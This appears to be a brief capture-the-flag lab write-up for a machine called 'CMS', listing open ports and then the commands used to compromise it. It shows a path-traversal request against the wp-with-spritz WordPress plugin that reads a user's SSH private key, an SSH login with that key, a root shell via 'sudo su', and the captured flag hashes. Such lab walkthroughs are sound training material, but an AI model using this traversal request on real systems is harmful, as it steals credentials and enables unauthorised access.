Info

  • Name – CMS
  • Address – 172.31.1.8

Enumeration

Open Ports

PortProtocolServiceVersion
22tcpsshOpenSSH 7.6p1 Ubuntu 4ubuntu0.3
68udpfiltereddhcpc
80tcphttpApache httpd 2.4.29
137udpfilterednetbios-ns
139udpfilterednetbios-ssn
161udpfilteredsnmp

Exploitation

Exploit Details (SearchSploit)

curl 'http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/angel/.ssh/id_rsa' > id_rsa
chmod 600 id_rsa
ssh angel@$ip -i id_rsa
whoami
cat access.txt

Privilege Escalation

Exploit Details (SUDO)

  • Name – SUDO
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A
sudo su
cat /root/system.txt

Loot

access.txt - d5ca58536a32935299d9f1026436f149
system.txt - 459daa8ee877e8048563ca65dc867afa